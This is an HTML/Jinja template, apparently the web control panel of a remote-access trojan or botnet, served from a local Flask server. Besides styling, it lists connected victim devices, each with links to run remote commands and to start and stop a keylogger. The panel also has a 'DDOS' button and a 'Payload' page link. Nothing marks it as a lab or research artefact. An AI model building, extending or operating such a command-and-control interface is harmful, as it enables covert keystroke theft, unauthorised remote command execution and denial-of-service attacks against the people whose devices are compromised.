<!DOCTYPE html>
<html>
<head>
    <style>
        body {
            background-color: black;
            color: white;
            font-size: 14px; 
            text-align: center; 
        }
        .device {
            width: 150px; 
            height: 150px; 
            background-color: #333; 
            overflow: hidden; 
            resize:both; 
            border: 1px solid white; 
            padding: 10px; 
            font-size: 12px; 
            transition: width 0.5s ease, height 0.5s ease; 
            text-align: center; 
            margin: auto; 
            margin-bottom: 10px; 
        }
        .dashboard {
            background-color: #585D55; 
            padding: 10px; 
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            z-index: 1000;
            border-bottom: 5px solid darkgrey;
        }
        .dashboard a {
            color: white; 
            text-decoration: none; 
            margin-right: 10px; 
        }
        .dashboard a:hover {
            color: #585D55; 
        }
        .title {
            margin-bottom: 20px;
            animation: easeInOut 4s;
        }
        @keyframes easeInOut {
            0% {
                opacity: 0;
            }
            100% {
                opacity: 1;
            }
         
        }
        .button {
            background-color: #585D55;
            border: none;
            color: white;
            padding: 5px 5px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 14px;
            margin: 4px 2px;
            cursor: pointer;
        }
        .button:hover {
            background-color: #585D55;
        }
        .execute-link {
            color: white; 
            text-decoration: none; 
            transition: color 0.3s ease; 
        }
        .execute-link:hover {
            color: #E6E45D; 
        }
    </style>
</head>
<body>
    <div class="dashboard">
        <a href="http://127.0.0.1:5000/">Home</a>
        <a href="http://127.0.0.1:5000/connections">Connections</a>
        <a href="http://127.0.0.1:5000/payload">Payload</a>
        <br>
    </div>
    
    <h1 class="title is-3"><br><br>List of Connections:</h1>
    <a href="/ddos" class="button">DDOS</a> 
    {% for i in threads %}
<div class="device" id="device{{ loop.index }}">
    <h2>Device {{ loop.index }}</h2>
    <a class="execute-link" href="http://127.0.0.1:5000/{{i.name }}/executecmd">Command Execution</a>
    

    <form action="/{{ i.name }}/startkeylogger" method="post">
        <input type="submit" class="button" value="Start Keylogger">
    </form>
    
    <!-- Button to stop keylogger -->
    <form action="/{{ i.name }}/stopkeylogger" method="post">
        <input type="submit" class="button" value="Stop Keylogger">
    </form>
</div>
{% endfor %}


</body>
</html>
